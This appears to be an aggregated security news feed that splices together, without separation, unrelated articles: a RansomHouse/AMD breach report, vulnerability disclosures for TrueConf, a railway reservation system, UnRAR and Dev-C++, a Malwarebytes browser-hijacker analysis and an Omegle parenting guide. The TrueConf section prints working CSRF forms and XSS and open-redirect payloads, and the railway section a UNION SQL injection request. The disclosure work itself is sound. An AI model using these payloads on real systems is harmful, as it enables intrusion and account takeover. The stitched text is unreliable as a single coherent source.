By Waqas
RansomHouse first appeared in cyberspace in December 2021. So far, the gang has claimed six victims, including Gaming…
This is a post from HackRead.com Read the original post: RansomHouse Claims Stealing 450GB of Data from Semiconductor Giant AMD

****RansomHouse first appeared in cyberspace in December 2021. So far, the gang has claimed six victims, including Gaming Authority (SLGA), Saskatchewan Liquor, and Shoprite Holdings.******AMD Suffers Data Breach**

Leading US-based chipmaker AMD is the latest alleged victim of a targeted data breach. The company’s spokesperson confirmed investigating a cyberattack from data cybercrime gang RansomHouse. The gang reportedly extorted data from AMD, however, the incident is currently under investigation.

List of targets claimed by the RansomHouse ransomware gang (Image: Hackread.com)

**How Much Data was Stolen?**

It is worth noting that RansomHouse hasn’t provided evidence of the data except for files containing AMD’s Windows domain information, which includes a CSV with a list of around 70,000 devices belonging to AMD’s internal network.

The hackers are pretty active on Telegram and brag about successfully targeting a three-letter company, the name of which starts with an A. AMD spokesperson stated that the attackers claim to have stolen around 450 GB of data, which they now threaten to sell.

RansomHouse on Telegram (Image: Hackread.com)

The group also added AMD to its data leak website and confirmed stealing 450 GB worth of data. RansomHouse stated that the stolen data includes financial and research-related information.

**Details of the Incident**

RansomHouse stated that they attacked AMD on 5 January 2022 and blamed the company’s weak security practices for the incident. The hackers revealed that they compromised AMD quickly as it used weak passwords on all its networks, such as ‘password’, ‘P@ssw0rd’, ‘amd!23’, and ‘Welcome1.’  

Screenshot from the official Dark Web domain of the RansomHouse ransomware gang (Image: Hackread.com)

Furthermore, the group confirmed that their associates attacked the AMD network last year, but the data was stolen in January 2022, and afterward, RansomHouse lost access to the company’s network.

The group also noted that they didn’t use ransomware during the attack and never contacted AMD for ransom. However, they intend to sell the data to interested parties and threat actors, which in their opinion, would be more profitable.

**More Ransomware News**

*   Iran’s COBALT MIRAGE Threat Group Behind Ransomware Attacks in US
*   GoodWill Ransomware demands food for the poor to decrypt locked files
*   Cardiologist Charged for Developing Jigsaw v.2 and Thanos Ransomware
*   Cyber Security Giant Mandiant Denies Hacking Claims By LockBit Ransomware
*   PoC Shows IoT Devices Can Be Hacked to Install Ransomware on OT Networks

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

RansomHouse Claims Stealing 450GB of Data from Semiconductor Giant AMD

A vulnerability classified as problematic was found in TrueConf Server 4.3.7. This vulnerability affects unknown code of the file /admin/service/stop/. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

    TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
    
    
    Vendor: TrueConf LLC
    Product web page: https://www.trueconf.com
    Affected version: 4.3.7.12255 and 4.3.7.12219
    
    Summary: TrueConf Server is a powerful, high-quality and highly secured
    video conferencing software server. It is specially designed to work with
    up to 250 participants in a multipoint conference over LAN or VPN networks.
    TrueConf Server requires no hardware and includes client applications for
    all popular platforms, making it an easy-to-set up, unified communications
    solution.
    
    Desc: The administration interface allows users to perform certain actions
    via HTTP requests without performing any validity checks to verify the requests.
    This can be exploited to perform certain actions with administrative privileges
    if a logged-in user visits a malicious web site.
    
    Input passed via the 'redirect_url' GET parameter is not properly verified before
    being used to redirect users. This can be exploited to redirect a user to an
    arbitrary website e.g. when a user clicks a specially crafted link to the affected
    script hosted on a trusted domain.
    
    TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
    input passed via several parameters to several scripts is not properly sanitized
    before being returned to the user. This can be exploited to execute arbitrary HTML
    and script code in a user's browser session in context of an affected site.
    
    
    Tested on: Microsoft Windows 7 Professional SP1 (EN)
               Apache/2.4.17 (Win32)
               PHP/5.4.41
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2017-5393
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php
    
    
    01.11.2016
    
    --
    
    
    CSRF Stored XSS:
    ----------------
    
    <html>
      <body>
        <form action="http://127.0.0.1:8888/admin/conferences/applyCreate" method="POST">
          <input type="hidden" name="send&#95;invite&#95;mail" value="1" />
          <input type="hidden" name="invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="hide&#95;invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="date" value="22&#46;01&#46;2017" />
          <input type="hidden" name="time&#45;field" value="17&#58;27" />
          <input type="hidden" name="time&#95;zone" value="60" />
          <input type="hidden" name="subtype" value="3" />
          <input type="hidden" name="podiums" value="6" />
          <input type="hidden" name="cid" value="&#92;c&#92;dfa95f7e1d" />
          <input type="hidden" name="key" value="dfa95f7e1d" />
          <input type="hidden" name="topic" value="<script>alert&#40;&apos;XSS&apos;&#41;<&#47;script>" />
          <input type="hidden" name="description" value="" />
          <input type="hidden" name="owner" value="" />
          <input type="hidden" name="gconf&#45;edit" value="ok" />
          <input type="hidden" name="webTtype" value="0" />
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>
    
    
    
    Reflected XSS:
    --------------
    
    http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=<img src=j onerror=confirm(251) >
    http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25<div><ScRiPt%20>prompt(251)</ScRiPt>
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?
    
    
    
    DOM XSS:
    --------
    
    http://127.0.0.1:8888/admin/group?'\><script>confirm("XSS")</script>
    http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"><script>alert("XSS")</script>
    
    
    
    Open Redirect:
    --------------
    
    Request:
    
    GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
    Host: 127.0.0.1:8888
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    
    Response:
    
    HTTP/1.1 302 Found
    Date: Thu, 22 Sep 2016 21:15:40 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: http://www.zeroscience.mk
    Content-Length: 0
    Keep-Alive: timeout=5, max=75
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
    
    
    
    CSRF Stop Web Service:
    ----------------------
    
    <html>
      <body>
        <form action="http://127.0.0.1/admin/service/stop/" method="POST">
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>

CVE-2017-20120: Offensive Security’s Exploit Database Archive

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/inquiries/view_details.php.

Permalink

Cannot retrieve contributors at this time

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/admin/inquiries/view\_details.php?id=

Vulnerability location: /orrs/admin/inquiries/view\_details.php?id=, id

dbname = orrs\_db

\[+\] Payload: /orrs/admin/inquiries/view\_details.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7--+ // Leak place ---> id

GET /orrs/admin/inquiries/view\_details.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close

CVE-2022-33042: bug_report/SQLi-1.md at main · 736335151/bug_report

Other applications using binary to extract untrusted archives are potentially vulnerable too

Other applications using binary to extract untrusted archives are potentially vulnerable too

A path traversal vulnerability in RarLab’s UnRAR binary can lead to remote code execution (RCE) on business email platform Zimbra and can potentially affect other software.

The UnRAR utility is used to extract RAR archives to a temporary directory for virus-scanning and spam-checking purposes.

However, a recently patched file-write flaw (CVE-2022-30333) means an unauthenticated attacker can “create files outside of the target extraction directory when an application or victim user extracts an untrusted archive”, according to a blog post published by Simon Scannell, vulnerability researcher at Swiss security firm Sonar (formerly SonarSource).

Catch up with the latest security research news

If malicious hackers manage to write to a known location, continued Scannell, they could potentially execute arbitrary commands on the system.

Successful exploitation of the high severity (CVSS 7.5) issue on Zimbra, an open source platform used by more than 200,000 businesses, “gives an attacker access to every single email sent and received on a compromised email server”.

They can also silently backdoor login functionalities and steal users’ credentials, as well as escalate access to an organization’s other internal services, warned Scannell.

**Symlink protection bypass**

The flaw resides in UnRAR’s mechanism for preventing symbolic link (symlink) attacks on Unix systems, whereby the function for validating relative symlinks, ,checks if the symlink target contains on Unix or on Windows.

This check can, however, be negated due to the fact that untrusted input is sometimes modified after it has been validated, which breaks assumptions made during the validation step.

Specifically, once the symlink has been validated, UnRAR converts backslashes (\\) to forward slashes (/) with to ensure that a RAR archive created on Windows can be extracted on a Unix system.

“By exploiting this behavior, an attacker can write a file anywhere on the target filesystem,” said Scannell.

**RCE on Zimbra**

Since the Amavis content filter used by Zimbra to analyze extracted files operates as the Zimbra user, added Scannell, the file-write primitive allows the creation and overwriting of files in other services’ working directories too.

The researcher detailed how an attacker could achieve RCE on Zimbra by writing a JSP shell to the web directory, using a file-based command injection, or creating an SSH key.

Sonar notified RarLab of the flaw on May 4, 2022, and a security patch was included with version 6.12 binaries, which were released on May 6.

Zimbr developer Synacor was also warned about the flaw on May 4 so it could warn users to patch their cloud instances.

A blog post detailing the technicalities was published yesterday (June 28).

Only Unix binaries – excluding Android – and implementations using RarLab’s code are affected.

Scannell thanked RarLab’s developers for “their very fast and professional handling of this issue”, and shouted out Zimbra’s security team for “warning their customers to help prevent exploitation”.

Zimbra is something of a specialty for Sonar, whose researchers have in the last 12 months discovered a bug chain leading to full Zimbra server compromise, an XSS flaw that powered spear phishing campaigns, and, only two weeks ago, a memcached injection vulnerability that imperilled login credentials.

RELATED Business email platform Zimbra patches memcached injection flaw that imperils user credentials

UnRAR path traversal flaw can lead to RCE in Zimbra

A binary hijack in Orwell-Dev-Cpp v5.11 allows attackers to execute arbitrary code via a crafted .exe file.

**Orwell-Dev-Cpp CreateProcessW Misuse Binary Hijack****Basic Info**

**Software name**：Orwell dev-cpp

**download**：https://sourceforge.net/projects/orwelldevcpp/

**Vuln Version**：v5.11and before

**Description**：When users run Dev-cpp in windows, we can see that it will try to run C:\\Program.exe, if C:\\Program.exe not exists, then it will run C:\\Program Files (x86)\\MingGW64\\bin\\gcc.exe. So an attacker can put C:\\Program.exe in C:, and it will execute arbitrary code when other users run Dev-Cpp.

**Analyse**

When we start devcpp.exe in windows, we can see that it will try to start process C:\Program Files (x86)\MingGW64\bin\gcc.exe with CreateProcessA

This vuln occured because the developer misuse CreateProcesAs API in AcGeneral.dll .

So an attacker which have write permission of C:\\ can place binary named C:\\Program.exe. And it will be executed when embarcadero dev-cpp started.

**Proof of Concept**

Poc Vedio

CVE-2022-33037: Vuln/Orwell-Dev-Cpp-CreateProcessA-Misuse-Binary-Hijack.md at main · ycdxsb/Vuln

A binary hijack in Embarcadero Dev-CPP v6.3 allows attackers to execute arbitrary code via a crafted .exe file.

**Embarcadero-Dev-Cpp CreateProcessW Misuse Binary Hijack****Basic Info**

**Software name**：embarcadero dev-cpp

**download**：https://github.com/Embarcadero/Dev-Cpp

**Vuln Version**：v6.3 and before

**Description**：When users run Dev-cpp in windows, we can see that it will try to run C:\\Program.exe, if C:\\Program.exe not exists, then it will run C:\\Program Files (x86)\\Embarcadero\\Dev-Cpp\\TDM-GCC-64\\bin\\gcc.exe. So an attacker can put C:\\Program.exe in C:, and it will execute arbitrary code when other users run Dev-Cpp.

**Analyse**

When we start devcpp.exe in windows, we can see that it will try to start process C:\Program Files (x86)\Embarcadero\Dev-cpp\TDM-GCC-64\bin\gcc.exe with CreateProcessW

This vuln occured because the developer misuse CreateProcess API. We can find it by the call stack.

An attacker which have write permission of C:\\ can place binary named C:\\Program.exe. And it will be executed when embarcadero dev-cpp started.

**Proof of Concept**

Poc Vedio

CVE-2022-33036: Vuln/Embarcadero-Dev-Cpp-CreateProcessW-Misuse-Binary-Hijack.md at main · ycdxsb/Vuln

XLPD v7.0.0094 and below contains an unquoted service path vulnerability which allows local users to launch processes with elevated privileges.

**XLpd7 Unquoted Service Path****Vuln Info**

Software name：Xldp 7

Software version：Xlpd-7.0.0094 (latest version)

Vuln Type：Unquoted Service Path

Vuln Influence：Arbitrary code execute

**Vuln Analyse**

The service path of xlpd7 in register is unquoted.

So when service manager started, it will search C:\\Program.exe at first.

*   if C:\\Program.exe exists, it will execute C:\\Program.exe
*   if C:\\Program.exe not exists，it will looking for XlpdCore.exe with C:\Program Files(x86)\NetSarang\Xlpd7\XlpdCore.exe

So an attacker with low privilege can put Program.exe under C:\\ and reboot the windows, then it will execute arbitrary code under SYSTEM context.

**Proof Of Concept**

The Program.exe will add a user named attack.

Poc Video

**Official Confirm**

CVE-2022-33035: Vuln/XLpd-Unquoted-Service-Path.md at main · ycdxsb/Vuln

Malwarebytes found a family of forced Chrome extensions that can't be removed because of a policy change that tells users "Your browser is managed".
The post Forced Chrome extensions get removed, keep reappearing appeared first on Malwarebytes Labs.

In the continued saga of annoying search extensions we have a new end-of-level boss.

Victims have been reporting browser extensions that were removed by Malwarebytes, but “magically” came back later. Since the victims also complained about the message saying their browser was “managed”, we had a pretty good idea where to look.

_custom search bar_ is _one of the forced extensions_

**Search extensions**

The culprits turned out to be search extensions. Which is often the case when we spot potentially unwanted programs (PUPs) that use malware tactics to get installed and gain persistence.

The search hijackers “active search bar” and “custom search bar” were both available in the Chrome web store at the time of writing even though we reported them days ago.

_active search bar is also available in the webstore_

**PowerShell**

It took some digging to find the origin, since all we had were the extensions. And when the extensions were installed directly from the webstore, nothing happened out of the ordinary. However, some hunting on VirusTotal soon led me to a few recently uploaded PowerShell scripts that included the string “ExtensionInstallForcelist.” I looked for that string because we know from the past that these registry policies account for the “Your browser is managed” warnings.

$CPath = "HKLM:\SOFTWARE\\Policies\\Google\\Chrome\ExtensionInstallForcelist";

$EPath = "HKLM:\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist";

The description in the Chromium documentation about the ExtensionInstallForcelist states:

> “Specifies a list of apps and extensions that are installed silently, without user interaction, and which cannot be uninstalled nor disabled by the user.”

And to confirm this finding, the victims that provided logs all had one of these PowerShell script listed in their Scheduled Tasks.

_The Scheduled Task triggers the PowerShell script_

The Scheduled Task was set to run every four hours, which explained why the extensions kept coming back.

**Installer**

But Scheduled Tasks don’t install themselves either and dropping PowerShell scripts in the System32 folder requires Administrator privileges, so we needed to dig a little further to find an installer.

The domain wincloudservice.com was used as a download location in all the PowerShell scripts so we used that domain as a search parameter in our next stage of VirusTotal hunting. This search eventually returned three installers. What they had in common at first glance was that the filenames all ended with “\_x64LTS.exe” and that they were all signed by “Tommy Tech LTD.”

Upon further inspection we noticed that the installers all asked for Administrator privileges twice. The first part installs something that is called “Setup” and the second part installs an application that aligns with the name of the installer. So, it appears that the original installer files were “patched” to add the installer for our browser hijacker. It stands to reason that these installers are offered for download somewhere by the threat actors.

The EULA points to tommytechil.com which is unreachable. I was unable to find an installer that actually dropped an extension in Edge, but the “Your browser is managed by your organization” setting does get enforced.

_Edge managed by your organization_

**Javascripts**

Malwarebytes customers were protected against these extensions as Malwarebytes’ web protection module blocked the domain wincloudservice\[.\]com. On inspection, this domain hosted several javascripts including heavily obfuscated files called crypto.js and crypto-js.min.js.

**Detection and removal**

Malwarebytes detects these browser hijackers as PUP.Optional.ActiveSearchBar and PUP.Optional.CustomSearchBar. Included in the removal procedure are the extension, and the Scheduled Task, which is enough to permanently get rid of the extension.

Some Windows registry changes have been made that will take a system administrator to decide what they want to keep or not.

The registry keys to remove the “Your browser is managed” are:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForceList

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForceList

And another change made by the installer was the registry value:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\\\\ExecutionPolicy

The installer set that to “Unrestricted” which may not be your favorite setting. If you are not sure or you have never actively set that policy, the default is “Restricted”. Please note that in some organizations PowerShell is required to run.

**IOCs**

**Domains:**

activesearchbar\[.\]me

customsearchbar\[.\]me

optimizerupdate\[.\]com

securedatacorner\[.\]com

wincloudservice\[.\]com

**Installers:**

4kvideodownloader\_5.22.371\_x64LTS.exe

AutoClicker\_x64LTS.exe

FPSUnlocker\_4.1\_x64LTS.exe

**PowerShell scripts:**

PrintWorkflowService.ps1

WindowsUpdater1.ps1

OptimizerWindows.ps1

**Extensions:**

custom search bar nniikbbaboifhfjjkjekiamnfpkdieng

active search bar pkofdnfadkamabkgjdjcddeopopbdjhg

Forced Chrome extensions get removed, keep reappearing

Chatting with strangers piqued millions of internet users’ interest during the pandemic. Omegle made this possible. Is my child safe to use it though?
The post Internet Safety Month: Everything you need to know about Omegle appeared first on Malwarebytes Labs.

Omegle reached the heady heights of fame when everyone least expected it. Thanks to TikTok influencers, children flocked to this 13-year-old platform during the pandemic, unaware of the dangers already there.

The concept of talking to strangers online is Omegle’s main selling point, but it’s not new. When you think about it, most of us always engage with strangers on online platforms that promote conversations and debate or inspire reactions.

But unlike other social sites, Omegle has scant security to protect anyone willing to take that risky but exciting dive. Users are, once again, left to fend for themselves as they explore an online world through a platform where the only thing simple is its interface.

Omegle’s front page. It used to sport the message: “Predators have been known to use Omegle, so please be careful.” However, it removed this due to a lawsuit alleging it knowingly pairs minors with child predators.

So what are the things every parent, potential and current user, or school personnel should know about; and what can they do to protect themselves and the children in their care?

**What do you need to sign up for Omegle?**

Nothing. Unlike other popular social networking sites, users wanting to try out Omegle don’t need to sign up and create a profile. You just need to visit it from your computer or smartphone’s browser to start.

Once a user is signed up and paired with another user, the platform automatically sets the names to “You” and “Stranger”.

**What are the risks of using Omegle?**

Because people are randomly paired up for a text or video chat, anyone could meet anyone. These include VCH (virtual cam whore) puppets (which are bots), other extortionists, and impersonators (including child predators).

Content in Omegle isn’t guaranteed clean either. Your child might be exposed to nudity, grooming, privacy threats (such as strangers earning your child’s trust so they can get sensitive information from them), scams, and sexual abuse.

There is also the risk of your child being coaxed into exposing themselves and their younger siblings, or performing sexual acts. Child predators and extortionists do this so they can sell the clips, keep them for personal use, or use them in other extortion campaigns to lure more Omegle users into participating in sexual acts. Remember that the majority of these incidents happen in a house where parents and other family members are present.

Lastly, your child could become a target of cyberbullies. One TikTok user documented his experience of racism while using Omegle to TikTok users. Dr. Joanne Meredith, a cyberpsychologist, said the incident is a consequence of people losing their inhibitions online.

> “Due to various features of online interaction—including dissociative imagination, or the view that the online world is a kind of game—people become less inhibited and behave in ways that they would not normally.”

**Does Omegle have any parental controls?**

No, none.

**What other features does Omegle have?**

Omegle used to have what it called “Spy Mode” (or “Spy (question) mode”), wherein the “spy” becomes the third party in a conversation between two strangers. The “spy” can ask questions for them to answer, or the “spy” could just listen in on the conversation without contributing.

This has now been removed, reportedly because it was being used to sell child pornography.

Another feature is the College Student Chat, where curious college students can enter their student email addresses before getting paired with others enrolled in their school.

Finally, there is the Adult chat function, which is free for kids to access.

**Is Omegle safe for kids?**

I think you know the answer to that at this point.

If your child looks up to a TikTok influencer who encourages followers to use Omegle, explain that it is not a safe place to meet other people online because it doesn’t have safeguards, unlike other social media platforms.

**Staying safe on Omegle**

It is better for parents, carers, and other responsible adults to deter their young persons from using Omegle altogether until they are 18. Personally, this is a non-negotiable because of the lack of safeguards and high risk of children being targeted, especially if they are young teen girls.

Any one-on-one stranger video chat platform like Omegle is risky for kids. It is paramount to keep an open and healthy communication with your child regarding this.

If you have found out your child has or continues to use Omegle, it’s time to sit them down for a quiet chat. Never punish them for being curious. Instead, let them know about the risks in order to explain why they need to stop using the platform until they’re at the right age.

Should your young person insist on using stranger video chat apps despite knowing the risks and repeated warnings, then do whatever you can to keep them from reaching these sites. Blacklist them locally using your security solution of choice with a web filter feature on your browser, on Windows via the HOSTS file (but take care not to put a lot of URLs there) or on a Mac.

Good luck!

Internet Safety Month: Everything you need to know about Omegle

A new security vulnerability has been disclosed in RARlab's UnRAR utility that, if successfully exploited, could permit a remote attacker to execute arbitrary code on a system that relies on the binary.
The flaw, assigned the identifier CVE-2022-30333, relates to a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.

A new security vulnerability has been disclosed in RARlab's UnRAR utility that, if successfully exploited, could permit a remote attacker to execute arbitrary code on a system that relies on the binary.

The flaw, assigned the identifier CVE-2022-30333, relates to a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.

Following responsible disclosure on May 4, 2022, the shortcoming was addressed by RarLab as part of version 6.12 released on May 6. Other versions of the software, including those for Windows and Android operating systems, are not impacted.

"An attacker is able to create files outside of the target extraction directory when an application or victim user extracts an untrusted archive," SonarSource researcher Simon Scannell said in a Tuesday report. "If they can write to a known location, they are likely to be able to leverage it in a way leading to the execution of arbitrary commands on the system."

It's worth pointing out that any software that utilizes an unpatched version of UnRAR to extract untrusted archives is affected by the flaw.

This also includes Zimbra collaboration suite, wherein the vulnerability could lead to pre-authenticated remote code execution on a vulnerable instance, giving the attacker complete access to an email server and even abuse it to access or overwrite other internal resources within the organization's network.

The vulnerability, at its heart, relates to a symbolic link attack in which a RAR archive is crafted such that it contains a symlink that's a mix of both forward slashes and backslashes (e.g., "..\\..\\..\\tmp/shell") so as to bypass current checks and extract it outside of the expected directory.

More specifically, the weakness has to do with a function that's designed to convert backslashes ('\\') to forward slashes ('/') so that a RAR archive created on Windows can be extracted on a Unix system, effectively altering the aforementioned symlink to "../../../tmp/shell."

By taking advantage of this behavior, an attacker can write arbitrary files anywhere on the target filesystem, including creating a JSP shell in Zimbra's web directory and execute malicious commands.

"The only requirement for this attack is that UnRAR is installed on the server, which is expected as it is required for RAR archive virus-scanning and spam-checking," Scannell noted.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows